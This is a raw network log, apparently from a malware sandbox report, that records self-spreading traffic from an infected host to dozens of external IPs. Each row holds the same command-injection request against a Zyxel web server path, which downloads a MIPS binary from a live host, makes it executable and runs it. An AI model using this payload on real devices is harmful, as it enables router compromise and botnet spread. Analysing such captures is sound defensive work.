                                                Jan 12, 2024 18:16:35.749258041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7649192.168.2.234972445.217.244.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749301910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7650192.168.2.2345724132.70.231.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749366045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7651192.168.2.234866648.73.244.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749403000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7652192.168.2.2344444198.11.181.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749435902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7653192.168.2.2348450101.85.140.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749530077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7654192.168.2.235745482.62.141.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749563932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7655192.168.2.234087614.149.137.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749593019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7656192.168.2.233715658.245.61.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749629021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7657192.168.2.2348478106.194.115.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749681950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7658192.168.2.2355160164.120.34.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749720097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7659192.168.2.2354268211.202.85.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749775887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7660192.168.2.2339284176.230.54.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749804974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7661192.168.2.235689625.227.247.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749852896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7662192.168.2.2347940118.192.54.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749912977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7663192.168.2.234741484.210.222.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749963045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7664192.168.2.2333808189.176.6.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750019073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7665192.168.2.235195639.155.202.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750057936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7666192.168.2.234556491.255.14.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750128984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7667192.168.2.2353156176.27.163.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750163078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7668192.168.2.234899898.84.224.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750240088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7669192.168.2.235568061.248.69.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750272989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7670192.168.2.235661625.18.71.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750330925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7671192.168.2.235515827.51.202.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750408888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7672192.168.2.2337550154.6.92.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750444889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7673192.168.2.2341252167.179.123.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750525951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7674192.168.2.2341962222.139.122.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750597000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7675192.168.2.2353026211.155.220.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750613928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7676192.168.2.235425624.169.224.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750626087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7677192.168.2.233528659.197.34.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750709057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7678192.168.2.2345082100.232.169.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750752926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7679192.168.2.2341312107.96.90.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750818968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7680192.168.2.2343992153.82.58.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750888109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7681192.168.2.2353492192.245.42.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750941038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7682192.168.2.2345706138.60.224.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.750946999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7683192.168.2.233504212.49.228.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751010895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7684192.168.2.235417491.8.39.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751075029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7685192.168.2.2347254129.124.48.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751117945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7686192.168.2.2351784105.181.248.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751159906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7687192.168.2.234370892.93.74.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751220942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7688192.168.2.234739041.91.73.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751285076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7689192.168.2.2357528219.199.131.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751322031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7690192.168.2.2355338109.233.221.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751358032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7691192.168.2.23374441.252.255.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751415968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7692192.168.2.234006076.69.185.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751465082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7693192.168.2.234087093.42.54.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751508951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7694192.168.2.235898025.95.133.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751569986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7695192.168.2.2355314144.135.161.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751630068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7696192.168.2.23556008.58.26.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751658916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7697192.168.2.2336784182.252.24.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751703024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7698192.168.2.2352974199.84.97.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751774073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7699192.168.2.2349252164.82.184.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751853943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7700192.168.2.2340852121.6.219.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.751879930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7701192.168.2.234861276.167.179.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756592035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7702192.168.2.2338612173.72.124.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756644011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7703192.168.2.233660898.210.111.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756681919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7704192.168.2.235445286.206.199.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756767035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7705192.168.2.2359004141.135.181.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756824970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7706192.168.2.235451490.82.5.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756872892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7707192.168.2.2360678109.181.162.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756951094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7708192.168.2.235218461.119.126.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.756984949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7709192.168.2.23363205.30.95.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.757029057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7710192.168.2.2333724137.40.206.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.757075071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7711192.168.2.2354030204.90.25.138443
                                                TimestampBytes transferredDirectionData
